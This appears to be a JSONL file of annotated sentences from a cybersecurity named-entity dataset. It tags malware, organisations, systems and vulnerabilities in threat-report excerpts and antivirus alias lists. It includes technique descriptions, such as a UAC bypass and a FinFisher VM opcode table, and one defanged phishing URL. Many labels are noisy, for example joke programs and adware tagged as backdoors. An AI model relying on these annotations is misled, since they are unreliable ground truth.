{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9910 Backdoor.Korplug BKDR_KORPLUG.AQU Backdoor.Win32.Gulpix.yu Backdoor.Gulpix.Win32.115 BKDR_KORPLUG.AQU Trojan/Korplug.a TR/Korplug.CX Trojan/Win32.Korplug Trojan.Graftor.D27053 Backdoor.Win32.Gulpix.yu Backdoor:Win32/Korplug.A!dha Backdoor/Win32.Korplug.R132401 Trojan.Injector Trj/CI.A Win32.Backdoor.Xplug.Auto Trojan.Korplug!cJRvYGQKvZc Trojan.Win32.Korplug W32/Korplug.AP!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000938", "source": "cyner2_valid"}}
{"text": "This instance of Kronos was configured to target US, Canadian, and Australian financial sites.", "spans": {"Malware: Kronos": [[17, 23]], "Organization: financial sites.": [[78, 94]]}, "info": {"id": "cyner2_valid_000939", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan.VB.Win32.22737 W32/VBTrojan.17E!Maximus Trojan.Win32.VB.tik Trojan.Win32.VB.qrzev Troj.W32.VB.tik!c BehavesLike.Win32.Autorun.qt W32/VBTrojan.17E!Maximus Trojan.VB.iaf Trojan/Win32.VB Trojan.Heur.EFD38D Trojan.Win32.VB.tik Trj/CI.A Win32.Trojan.Vb.Wstt Trojan.VB!GS478WYbRuw W32/VB.F", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000940", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: BrowserModifier.Diplugem.A5 Trojan/ExtenBro.cb Trojan.Adware.Midie.D14BF Win32.Trojan.ExtenBro.a Trojan.Win32.BPlug.ehtqrq Trojan.BPlug.1099 Trojan.ExtenBro W32.Trojan.Extenbro TR/ExtenBro.jrruf GrayWare[AdWare]/Win32.ExtBro Trojan:Win32/ExtenBro.D.bit! Trj/GdSda.A Win32/Trojan.b1c", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000941", "source": "cyner2_valid"}}
{"text": "A company representative declined to comment for this post .", "spans": {}, "info": {"id": "cyner2_valid_000942", "source": "cyner2_valid"}}
{"text": "In those slides CSE assess with moderate certainty that this group is a French intelligence agency.", "spans": {"Organization: CSE": [[16, 19]]}, "info": {"id": "cyner2_valid_000943", "source": "cyner2_valid"}}
{"text": "XcodeGhost is the first compiler malware in OS X.", "spans": {"Malware: XcodeGhost": [[0, 10]], "Malware: compiler malware": [[24, 40]], "System: OS X.": [[44, 49]]}, "info": {"id": "cyner2_valid_000944", "source": "cyner2_valid"}}
{"text": "The addition of mobile threat defense into these capabilities means that Microsoft Defender for Endpoint ( previously Microsoft Defender Advanced Threat Protection ) now delivers protection on all major platforms .", "spans": {"System: Microsoft Defender": [[73, 91]], "System: Microsoft Defender Advanced Threat Protection": [[118, 163]]}, "info": {"id": "cyner2_valid_000945", "source": "cyner2_valid"}}
{"text": "FinFisher loader calling native Windows API to perform anti-debugging tricks At this point , the fun in analysis is not over .", "spans": {"Malware: FinFisher": [[0, 9]], "System: Windows": [[32, 39]]}, "info": {"id": "cyner2_valid_000946", "source": "cyner2_valid"}}
{"text": "Trend Micro offers security for Android mobile devices through Mobile Security for Android™ to protect against these types of attacks .", "spans": {"Organization: Trend Micro": [[0, 11]], "System: Android": [[32, 39]], "System: Mobile Security for Android™": [[63, 91]]}, "info": {"id": "cyner2_valid_000947", "source": "cyner2_valid"}}
{"text": "Victims ’ first encounter with the malware reportedly comes via an unsolicited text message that their Android smartphone receives .", "spans": {"System: Android smartphone": [[103, 121]]}, "info": {"id": "cyner2_valid_000948", "source": "cyner2_valid"}}
{"text": "The TTPs used in this attack also match those detailed in the paper.", "spans": {}, "info": {"id": "cyner2_valid_000949", "source": "cyner2_valid"}}
{"text": "RuMMS samples and C2 servers Figure 8 shows how these samples , C2 servers and hosting websites are related to each other , including when they were compiled or observed .", "spans": {"Malware: RuMMS": [[0, 5]]}, "info": {"id": "cyner2_valid_000950", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Reconyc.1463296 Trojan.Reconyc Trojan.Win32.Reconyc.ikny Trojan.Win64.Reconyc.euumvq Trojan.Win32.Z.Reconyc.1463296 Troj.W32.Reconyc!c TR/Reconyc.jhmvt Trojan/Win32.Reconyc Trojan.Win32.Reconyc.ikny Trojan/Win32.Reconyc.C1837813 Trojan.Reconyc Trj/CI.A Win32.Trojan.Reconyc.Akpg Trojan.Win32.Reconyc W32/Reconyc.HXLM!tr Win32/Trojan.d73", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000951", "source": "cyner2_valid"}}
{"text": "For example DMA Locker 3.0, Cerber, or some newer editions of Locky.", "spans": {"Malware: DMA Locker 3.0, Cerber,": [[12, 35]], "Malware: newer editions of Locky.": [[44, 68]]}, "info": {"id": "cyner2_valid_000953", "source": "cyner2_valid"}}
{"text": "Whereas botnets previously had to run on systems that attackers owned or had compromised, now bots can run on Skype and other cloud-based chat programs, providing an even lower-cost alternative for attackers.", "spans": {"Malware: botnets": [[8, 15]], "System: systems": [[41, 48]], "Vulnerability: compromised,": [[77, 89]], "System: Skype": [[110, 115]], "System: cloud-based chat programs,": [[126, 152]]}, "info": {"id": "cyner2_valid_000954", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: VB:Trojan.Valyria.1212 VB:Trojan.Valyria.1212 VB:Trojan.Valyria.1212 VB:Trojan.Valyria.1212 VB:Trojan.Valyria.1212 VB:Trojan.Valyria.1212 HEUR_VBA.E Trojan.SBVF-4 VB:Trojan.Valyria.D4BC virus.office.qexvmc.1065", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000955", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Mikey.DDE47 W32/Trojan2.PBBS W32/Trojan.ZGWN-4268 TR/Disclipboard.pjtux Win32/Delf.TMP Trj/CI.A Win32/Trojan.2a9", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000956", "source": "cyner2_valid"}}
{"text": "The malware evoulve since its previous variant and now arrives with new capabilities.", "spans": {}, "info": {"id": "cyner2_valid_000957", "source": "cyner2_valid"}}
{"text": "We also observed automatically generated files on the C2 , indicating the actor behind this campaign also issues commands to search for and exfiltrate PDF and Office documents .", "spans": {}, "info": {"id": "cyner2_valid_000958", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Explaol.78718 Win32.Trojan.WisdomEyes.16070401.9500.9993 AOL.Trojan Win.Trojan.Explaol-1 Trojan.Win32.Explaol.gljz Troj.IM.W32.Explaol!c TrojWare.Win32.AOL.Explaol.A Trojan.Expla Trojan.Explaol.Win32.1 APStrojan.tn W32/Trojan.DRFT-5550 Trojan/AOL.Explaol Trojan[IM]/Win32.Explaol Trojan.Razy.D1D187 Trojan/Win32.LdPinch.C26165 APS.tn TrojanIM.Explaol Win32/AOL.Explaol.A Trojan.AOL.Explaol!Hfs0yqLP9Gg Trojan.Win32.AOL W32/Explaol.A!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000959", "source": "cyner2_valid"}}
{"text": "But they already have a lot of infected users on whom to test their methods .", "spans": {}, "info": {"id": "cyner2_valid_000960", "source": "cyner2_valid"}}
{"text": "Our analysis suggests that the four short numbers are associated with Russian financial institutions , presumably where a victim would be likely to have accounts .", "spans": {}, "info": {"id": "cyner2_valid_000961", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.BitwanX.Trojan Trojan-Ransom.Win32.Fullscreen!O Ransom.Weenloc.A8 Trojan.Winlock Trojan-Ransom.Win32.Blocker.jzec Trojan/LockScreen.agu Ransom_WINLOCK.SM Win32.Trojan.LockScreen.b W32/Trojan2.OAEZ Trojan.Ransomlock Win32/Ransom.PC Ransom_WINLOCK.SM Win.Trojan.Fullscreen-41 Trojan-Ransom.Win32.Blocker.jzec Trojan.Win32.Fullscreen.crnep Trojan.Win32.A.ChameleonUnlicence.383298 Trojan.Winlock.3333 Trojan.Fullscreen.Win32.35 Trojan-Ransom.Win32.Fullscreen W32/Trojan.GDVD-7096 Trojan/Fullscreen.ak Trojan[Ransom]/Win32.PornoAsset.cioy Ransom:Win32/Weenloc.A Trojan-Ransom.Win32.Blocker.jzec Trojan/Win32.Atraps.R214152 Hoax.PornoAsset Trojan.Fullscreen Win32/LockScreen.AGU", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000962", "source": "cyner2_valid"}}
{"text": "MacOSX Malware OSX/Pirrit", "spans": {"System: MacOSX": [[0, 6]], "Malware: Malware": [[7, 14]]}, "info": {"id": "cyner2_valid_000963", "source": "cyner2_valid"}}
{"text": "Most of the affected devices were located in the Middle East , and many of the stolen data we saw is military-related ( e.g. , images , documents ) .", "spans": {}, "info": {"id": "cyner2_valid_000964", "source": "cyner2_valid"}}
{"text": "DualToy is still active and we have detected over 8,000 unique samples belonging to this Trojan family to date.", "spans": {"Malware: DualToy": [[0, 7]], "Malware: Trojan family": [[89, 102]]}, "info": {"id": "cyner2_valid_000965", "source": "cyner2_valid"}}
{"text": "Over the past two years, this group's activity has increased significantly, with numerous attacks against government departments and embassies all over the world.", "spans": {"Organization: government departments": [[106, 128]], "Organization: embassies": [[133, 142]]}, "info": {"id": "cyner2_valid_000966", "source": "cyner2_valid"}}
{"text": "A remarkable fact is that all the targeted apps relate to Spanish banks , including targets never seen before in any other Android banking Trojan .", "spans": {"System: Android": [[123, 130]]}, "info": {"id": "cyner2_valid_000967", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Gofot Trojan.Heur.RX.E0D4E8 Spyware.Keylogger Trojan.Win32.Gofot.ige Trojan.Win32.Gofot.ewpvcy Win32.Trojan.Gofot.Akos WIN.MACRO.Virus BehavesLike.Win32.Trojan.cm Trojan/Win32.Gofot Trojan.Win32.Gofot.ige Trojan/Win32.FakeMS.R38399 Trojan.FKM!lm2VdjZ5xTI Trojan.Win32.Danglo", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000968", "source": "cyner2_valid"}}
{"text": "In doing so, the attacker can remain out of view from antivirus technologies, and even next-generation' technologies that only focus on file-based threat vectors.", "spans": {"Organization: antivirus technologies,": [[54, 77]], "Vulnerability: file-based threat vectors.": [[136, 162]]}, "info": {"id": "cyner2_valid_000969", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.Inject.r4 Spyware.Zbot.ED Trojan.Sharik.Win32.637 Win32.Trojan.WisdomEyes.151026.9950.9994 W32/Trojan.YLTQ-8086 Trojan.Zbot TROJ_SPNR.11F514 Trojan.Win32.Zbot.cxjaze Trojan.Win32.Z.Zbot.315392.DQ[h] TrojWare.Win32.Injector.OWLP Trojan.PWS.Stealer.1932 TROJ_SPNR.11F514 BehavesLike.Win32.Downloader.fc TR/Spy.ZBot.rzoqov Trojan/Win32.Inject Trojan.Zboter.5 Backdoor.W32.Simda.lXOM Trojan:Win32/Chebri.B Trojan/Win32.Fareit.N1169001314 Trojan.Inject Win32.Trojan.Spy.Pjdn Trojan.Inject!Wt2mU/5sSds Trojan-PWS.Win32.Zbot W32/Kryptik.WIF!tr SHeur4.BURV", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000970", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan.ChePro Trojan.Banker Win32.Trojan.WisdomEyes.16070401.9500.9834 Infostealer.Bancos Trojan-Banker.Win32.ChePro.ink Trojan.Win32.ChePro.dmluub Troj.Banker.W32.Chepro!c Trojan/Banker.ChePro.adp TR/Crypt.Xpack.100961 Trojan[Banker]/Win32.ChePro Trojan.Symmi.DA527 Trojan-Banker.Win32.ChePro.ink TrojanDownloader:Win32/Reboon.F Trojan/Win32.Banload.C643313 Win32.Trojan-banker.Chepro.Pefs Trojan-Downloader.Win32.Banload W32/Banload.URD!tr.dldr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000971", "source": "cyner2_valid"}}
{"text": "In the newly discovered attack campaign, Unit 42 identified attacks targeting organizations within the telecommunications, high tech, education, manufacturing, and legal services industries.", "spans": {"Organization: Unit 42": [[41, 48]], "Organization: organizations": [[78, 91]], "Organization: telecommunications, high tech, education, manufacturing,": [[103, 159]], "Organization: legal services industries.": [[164, 190]]}, "info": {"id": "cyner2_valid_000972", "source": "cyner2_valid"}}
{"text": "This leads us to believe that Zen is just part of a larger infection chain .", "spans": {"Malware: Zen": [[30, 33]]}, "info": {"id": "cyner2_valid_000973", "source": "cyner2_valid"}}
{"text": "This report describes an espionage operation using government-exclusive spyware to target a Mexican government food scientists and two public health advocates.", "spans": {"Malware: government-exclusive spyware": [[51, 79]], "Organization: Mexican government food scientists": [[92, 126]], "Organization: public health advocates.": [[135, 159]]}, "info": {"id": "cyner2_valid_000974", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.Karba.228120.B TrojanAPT.Garveep.B4 Trojan.Jatif.43 Trojan.ADH.2 Win32/Tnega.eSIVZX TROJ_GARVEEP.SM Html.Trojan.DarkhotelKarba-1 Trojan.Win32.Karba.b Trojan.Win32.Karba.cweynb Troj.W32.Karba.b!c TrojWare.Win32.Dialer.AFXP Trojan.DarkHtl.1 Trojan.Karba.Win32.5 TROJ_GARVEEP.SM W32/Trojan.IWOC-1805 Trojan.Karba.b Worm/Win32.Luder Trojan:Win32/Nemain.A Trojan.Win32.Karba.b Worm/Win32.Luder.R95856 Worm.Luder Win32/Nemim.B Win32.Virus.Nemim.Gls Trojan.Karba! Virus.Win32.Nemim W32/Luder.BSMU!worm Win32/Trojan.3ef", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000975", "source": "cyner2_valid"}}
{"text": "In the case of 32-bit systems , the malware may attempt a known UAC bypass by launching printui.exe system process and using token manipulation with NtFilterToken as described in this blog post .", "spans": {}, "info": {"id": "cyner2_valid_000977", "source": "cyner2_valid"}}
{"text": "If it does , it will commence with the billing process .", "spans": {}, "info": {"id": "cyner2_valid_000978", "source": "cyner2_valid"}}
{"text": "This new XLoader variant poses as a security app for Android devices , and uses a malicious iOS profile to affect iPhone and iPad devices .", "spans": {"Malware: XLoader": [[9, 16]], "System: Android": [[53, 60]], "System: iOS": [[92, 95]], "System: iPhone": [[114, 120]], "System: iPad": [[125, 129]]}, "info": {"id": "cyner2_valid_000979", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/Delf.iic Win32/Delf.IIC Trojan.Delf-11296 Trojan-Downloader.Win32.DlfBfkg.ln BehavesLike.Win32.Ramnit.fz Trojan/Delf.fsx W32/Delf.IIC!tr Trojan.Heur.E739EC HEUR/Fakon.mwf Worm:Win32/Scrolo.A Worm.Win32.Scrolo Luhe.Fiha.E.dropper", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000980", "source": "cyner2_valid"}}
{"text": "At this time, the malware targets banks, payment card providers, mobile services providers, payroll, webmail and e-commerce sites in the U.S. Two major banks in the U.K. are also on the target list the malware fetches.", "spans": {"Malware: malware": [[18, 25]], "Organization: banks, payment card providers, mobile services providers, payroll, webmail": [[34, 108]], "Organization: e-commerce sites": [[113, 129]], "Organization: major banks": [[146, 157]], "Malware: the malware": [[198, 209]]}, "info": {"id": "cyner2_valid_000981", "source": "cyner2_valid"}}
{"text": "Similar to HummingBad , the malware also fakes device identification information , such as IMEI and IMSI , to download an app twice while seeming like the installation is happening on a different device , thereby doubling the potential revenue .", "spans": {"Malware: HummingBad": [[11, 21]]}, "info": {"id": "cyner2_valid_000982", "source": "cyner2_valid"}}
{"text": "In recent months, our team has been tracking a keylogger malware family named KeyBase that has been in the wild since February 2015.", "spans": {"Organization: team": [[22, 26]], "Malware: keylogger malware": [[47, 64]], "Malware: KeyBase": [[78, 85]]}, "info": {"id": "cyner2_valid_000983", "source": "cyner2_valid"}}
{"text": "Also, ITG08's DNS tunneling uses the layer 4 protocol, User Datagram Protocol UDP.", "spans": {"System: DNS tunneling": [[14, 27]], "System: User Datagram Protocol UDP.": [[55, 82]]}, "info": {"id": "cyner2_valid_000985", "source": "cyner2_valid"}}
{"text": "Curiously , several of these have included the world \" Fateh '' in their package name , which may be referring to the Fatah political party .", "spans": {"Organization: Fatah": [[118, 123]]}, "info": {"id": "cyner2_valid_000986", "source": "cyner2_valid"}}
{"text": "The malware was spread using spear-phishing emails and the level of sophistication is low.", "spans": {"Malware: malware": [[4, 11]]}, "info": {"id": "cyner2_valid_000987", "source": "cyner2_valid"}}
{"text": "To do this , open the displayed link on your mobile phone by typing in the URL field of your browser or scan the displayed QR code .", "spans": {}, "info": {"id": "cyner2_valid_000989", "source": "cyner2_valid"}}
{"text": "Nabucur encrypts files across a machine, and is also a polymorphic virus that infects files.", "spans": {"Malware: Nabucur": [[0, 7]], "System: machine,": [[32, 40]], "Malware: a polymorphic": [[53, 66]]}, "info": {"id": "cyner2_valid_000991", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan-Downloader/W32.Kuluoz.241664 TrojanDownloader.Kuluoz Win32.Trojan.WisdomEyes.16070401.9500.9996 Backdoor.IRC.Bot Trojan-Downloader.Win32.Kuluoz.wob Trojan.Win32.Kuluoz.exdcku Troj.Downloader.W32.Kuluoz!c BehavesLike.Win32.Ransomware.dt TrojanDownloader.Kuluoz.abm TR/Crypt.Xpack.yedzb Trojan[Downloader]/Win32.Kuluoz Trojan-Downloader.Win32.Kuluoz.wob Backdoor:Win32/Unskal.D Trj/GdSda.A Trojan.Win32.Crypt W32/Kryptik.EYUI!tr Win32/Trojan.Downloader.b18", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000992", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Trojan/W32.FlyStudio.1143740 Trojan-Dropper.Win32.Flystud!O Trojan.FlyStudio.Win32.10928 Win32/SillyAutorun.ALB TSPY_FLYSTUDIO_BL130294.TOMC Trojan.Win32.FlyStudio.abg Trojan.Win32.FlyStudio.dwzdm Troj.W32.FlyStudio.lKXj TSPY_FLYSTUDIO_BL130294.TOMC BehavesLike.Win32.Autorun.tc Trojan.Win32.FlyStudio Trojan/FlyStudio.eef Trojan/Win32.FlyStudio.abg Trojan:Win32/Floyadi.A!bit Trojan.Heur.GC.ED2BD4 Trojan.Win32.FlyStudio.abg Win32.Trojan.FlyStudio.A Trojan.FlyStudio Trojan.FlyStudio", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000993", "source": "cyner2_valid"}}
{"text": "With this post, we hope to add a little more color and supplement what you already know about this prolific malware distributor.", "spans": {}, "info": {"id": "cyner2_valid_000994", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Joke.Stupid.A Joke.Stupid.A Hoax.W16.BadJoke.Stupid.a!c Joke.Stupid.A Joke.Idiot Win.Joke.WinStupid-1 Hoax.Win16.BadJoke.Stupid.a Joke.Stupid.A Riskware.Win16.Stupid.bvpxe Win16.Trojan-psw.Badjoke.Apwo Joke.Stupid.A ApplicUnsaf.Win16.Hoax.BadJoke.Stupid.a Joke.Stupid.A Trojan.Stupid Tool.Stupid.Win16.1 Joke-SmallP.a not-virus:Joke.Win16.Stupid.a Joke.Stupid.A Joke-SmallP.a not-a-virus:BadJoke.Win16.Stupid.a Riskware/Win.STUPID", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000995", "source": "cyner2_valid"}}
{"text": "The main driver behind this traffic is the Necurs botnet.", "spans": {"Malware: the Necurs botnet.": [[39, 57]]}, "info": {"id": "cyner2_valid_000996", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: Android.Trojan.SLocker.ALV Trojan:Lockdroid.E Android.Trojan.SLocker.ALV HEUR:Trojan-Ransom.AndroidOS.Svpeng.ad A.H.Rog.LgqLOC Troj.Ransom.Androidos!c Android.Malware.Trojan Android.Locker.471.origin Trojan[Ransom]/Android.Svpeng Android.Trojan.SLocker.ALV Android-Trojan/Koler.6c8c0 HEUR:Trojan-Ransom.AndroidOS.Svpeng.ad a.rogue.simplocker.e Trojan-Ransom.AndroidOS.PornoLocker", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000997", "source": "cyner2_valid"}}
{"text": "Such an action can be performed at any moment , regardless of the current application or user location in that application .", "spans": {}, "info": {"id": "cyner2_valid_000998", "source": "cyner2_valid"}}
{"text": "The opcode instructions generated by this custom VM are divided into different categories : Logical opcodes , which implement bit-logic operators ( OR , AND , NOT , XOR ) and mathematical operators Conditional branching opcodes , which implement a code branch based on conditions ( equals to JC , JE , JZ , other similar branching opcodes ) Load/Store opcodes , which write to or read from particular addresses of the virtual address space of the process Specialized opcodes for various purposes , like execute specialized machine instruction that are not virtualized We are publishing below the ( hopefully ) complete list of opcodes used by FinFisher VM that we found during our analysis and integrated into our de-virtualization script : INDEX MNEMONIC DESCRIPTION 0x0 EXEC Execute machine code 0x1 JG Jump if greater/Jump if not less or equal 0x2 WRITE Write a value into the dereferenced internal VM value ( treated as a pointer ) 0x3 JNO Jump if not overflow 0x4 JLE Jump if less or equal ( signed ) 0x5 MOV Move the value of a register into the VM descriptor ( same as opcode 0x1F ) 0x6 JO Jump if overflow 0x7 PUSH Push the internal VM value to the stack 0x8 ZERO Reset the internal VM value to 0 ( zero ) 0x9 JP Jump if parity even 0xA WRITE Write into an address 0xB ADD Add the value of a register to the internal VM value 0xC JNS Jump if not signed 0xD JL Jump if less ( signed ) 0xE EXEC Execute machine code and branch 0xF JBE Jump if below or equal or Jump if not above 0x10 SHL Shift left the internal value the number of times specified into the opcodes 0x11 JA Jump if above/Jump if not below or equal 0x12 MOV Move the internal VM value into a register 0x13 JZ JMP if zero 0x14 ADD Add an immediate value to the internal Vm descriptor 0x15 JB Jump if below ( unsigned ) 0x16 JS Jump if signed 0x17 EXEC Execute machine code ( same as opcode 0x0 ) 0x18 JGE Jump if greater or equal/Jump if not less 0x19 DEREF Write a register value into a dereferenced pointer 0x1A JMP Special obfuscated “ Jump if below ” opcode 0x1B * Resolve a pointer 0x1C LOAD Load a value into the internal VM descriptor 0x1D JNE Jump if not equal/Jump if not zero 0x1E CALL Call an external function or a function located in the dropper 0x1F MOV Move the value of a register into the VM descriptor 0x20 JNB Jump if not below/Jump if above or equal/Jump if not carry 0x21 JNP Jump if not parity/Jump if parity odd Each virtual instruction is stored in a special data structure that contains all the information needed to be properly read and executed by the VM .", "spans": {"Malware: FinFisher": [[643, 652]]}, "info": {"id": "cyner2_valid_000999", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: JS/Crypted.LS JS/Exploit.Pdfka.OYP Exploit.JS.Pdfka.ffn Exploit.Script.Heuristic-pdf.gutws Exploit.PDF.1988 HEUR_PDFEXP.B BehavesLike.PDF.Evasion.cr PDF/Obfusc.F!Camelot EXP/Pidief.aag.28 Exploit:JS/ShellCode.AF Exploit.JS.Pdfka.ffn", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001000", "source": "cyner2_valid"}}
{"text": "The threat actor used Cobalt Strike, AdFind to gather AD information, exploited the Zero Logon vulnerability CVE-2020-1472, and deployed Quantum ransomware using PSExec.", "spans": {"Malware: Cobalt Strike, AdFind": [[22, 43]], "Vulnerability: exploited the Zero Logon vulnerability": [[70, 108]], "Malware: Quantum ransomware": [[137, 155]], "Malware: PSExec.": [[162, 169]]}, "info": {"id": "cyner2_valid_001001", "source": "cyner2_valid"}}
{"text": "It was seen around 2015:02:18.", "spans": {}, "info": {"id": "cyner2_valid_001002", "source": "cyner2_valid"}}
{"text": "CLOAKING Client-side Carrier Checks In our basic command & control example above , we didn ’ t address the ( incorrectly labeled ) “ imei ” field .", "spans": {}, "info": {"id": "cyner2_valid_001003", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.W.Sircam.l8kk Heur.Corrupt.PE Worm[Email]/Win32.Sircam Worm:Win32/Sircam.D@mm.dam#2", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001004", "source": "cyner2_valid"}}
{"text": "Characterized by relatively unsophisticated technical merit and extensive use of spear phishing, the group targeted individuals and organizations in the Middle East including targets inside Iran itself, as well as across Europe and in the United States.", "spans": {"Organization: individuals": [[116, 127]], "Organization: organizations": [[132, 145]]}, "info": {"id": "cyner2_valid_001005", "source": "cyner2_valid"}}
{"text": "Once the observed Gmail account was under their control, the actors then forwarded malware to over a hundred of their contacts, ranging from an address for the United Nations Refugee Agency in Turkey to a site contact for Reza Pahlavi, the son of the deposed Shah Mohammad Reza Pahlavi.", "spans": {"Malware: malware": [[83, 90]], "Organization: contacts,": [[118, 127]], "Organization: the United Nations Refugee": [[156, 182]]}, "info": {"id": "cyner2_valid_001006", "source": "cyner2_valid"}}
{"text": "In red , we see those values being passed into the suspicious Java method through the registered interface .", "spans": {}, "info": {"id": "cyner2_valid_001010", "source": "cyner2_valid"}}
{"text": "While investigating a recent security incident, Unit 42 found a webshell that we believe was used by the threat actor to remotely access the network of a targeted Middle Eastern organization.", "spans": {"Organization: Unit 42": [[48, 55]], "System: webshell": [[64, 72]], "Organization: Middle Eastern organization.": [[163, 191]]}, "info": {"id": "cyner2_valid_001011", "source": "cyner2_valid"}}
{"text": "After the profile is installed , the user will then be redirected to another Apple phishing site .", "spans": {"Organization: Apple": [[77, 82]]}, "info": {"id": "cyner2_valid_001012", "source": "cyner2_valid"}}
{"text": "Lookout researchers have been tracking this threat for the last month .", "spans": {"Organization: Lookout": [[0, 7]]}, "info": {"id": "cyner2_valid_001013", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32/Pate.dr Backdoor.Bot W32/Eyeveg.f I-Worm.Eyeveg!zj+VAcYzzNU W32.Lanieca.A@mm Win32/Eyeveg.I Email-Worm.Win32.Eyeveg.f Trojan.Win32.Eyeveg.haym Win32.Worm-email.Eyeveg.Wtxf Win32.HLLW.Eyeveg.2 Worm.Eyeveg.Win32.18 BehavesLike.Win32.Sality.lc I-Worm/Eyeveg.g TR/Dldr.Small.atx.1 W32/Eyeveg.F@mm Worm[Email]/Win32.Eyeveg W32.W.Eyeveg.f!c Worm/Win32.IRCBot Worm:Win32/Eyeveg.E Trojan.BHORA.05647 W32/Eyeveg.D.worm I-Worm.Eyeveg.I Worm/Eyeveg.M Worm.Win32.Eyeveg.I", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001014", "source": "cyner2_valid"}}
{"text": "If the user has launched Play Market , the Trojan intercepts the event and displays a window on top of the Google Play window , prompting the user to enter his/her bank card details in the fake window .", "spans": {"System: Play Market": [[25, 36]], "System: Google Play": [[107, 118]]}, "info": {"id": "cyner2_valid_001016", "source": "cyner2_valid"}}
{"text": "Recently, Cyphort Labs received multiple malware samples that were used to target a financial institution in Asia.", "spans": {"Organization: Cyphort Labs": [[10, 22]], "Malware: malware": [[41, 48]], "Organization: financial institution": [[84, 105]]}, "info": {"id": "cyner2_valid_001017", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.MosquitoQKK.Fam.Trojan Backdoor/W32.Winker.35840 W32/Risk.KYQV-3380 Backdoor.Trojan BKDR_WINKER.J Win.Trojan.Winker-3 Backdoor.Win32.Winker.j Trojan.Win32.Winker.ejnu Backdoor.W32.Winker.j!c Backdoor.Win32.Winker.J BackDoor.Winker Backdoor.Winker.Win32.3 BKDR_WINKER.J BehavesLike.Win32.Mydoom.nc TrojanDownloader.ZMailBody Trojan[Backdoor]/Win32.Winker Trojan.Heur.PT.cmGfb4TaW3pb Backdoor.Win32.Winker.j Backdoor:Win32/Winker.H Trojan/Win32.Winker.C262606 Backdoor.Winker Bck/Winker.B Win32/Winker.J Win32.Backdoor.Winker.Hqbx Backdoor.Winker!Rg36gBAv3uo", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001018", "source": "cyner2_valid"}}
{"text": "On August 10 and 11, 2016, Mansoor received SMS text messages on his iPhone promising new secrets about detainees tortured in UAE jails if he clicked on an included link.", "spans": {"System: iPhone": [[69, 75]]}, "info": {"id": "cyner2_valid_001021", "source": "cyner2_valid"}}
{"text": "A backdoor also known as: W32.HfsAutoB.DBB5 Backdoor.Win32.Torr!O Backdoor/Torr.lgj Backdoor.Trojan Trojan.Win32.Torr.bjcnz Backdoor.Win32.Popwin.~IQ BackDoor.Bull BehavesLike.Win32.Trojan.qc Backdoor:Win32/Yonsole.B Backdoor/Win32.Hupigon.C90957 Backdoor.Torr Trojan.MalPack.NSPack Backdoor.Win32.Hupigon Trj/CI.A Win32/Trojan.b8d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_001022", "source": "cyner2_valid"}}
{"text": "In April and July of 2017, Bankbot-infected apps were detected posing as entertainment and online banking apps on Google Play.", "spans": {"Malware: Bankbot-infected": [[27, 43]], "System: apps": [[44, 48]], "System: entertainment": [[73, 86]], "System: online banking apps": [[91, 110]], "System: Google Play.": [[114, 126]]}, "info": {"id": "cyner2_valid_001023", "source": "cyner2_valid"}}
{"text": "] top/ Oct 23 , 2017 hxxp : //online.bankaustria.at.id8817466 [ .", "spans": {}, "info": {"id": "cyner2_valid_001024", "source": "cyner2_valid"}}
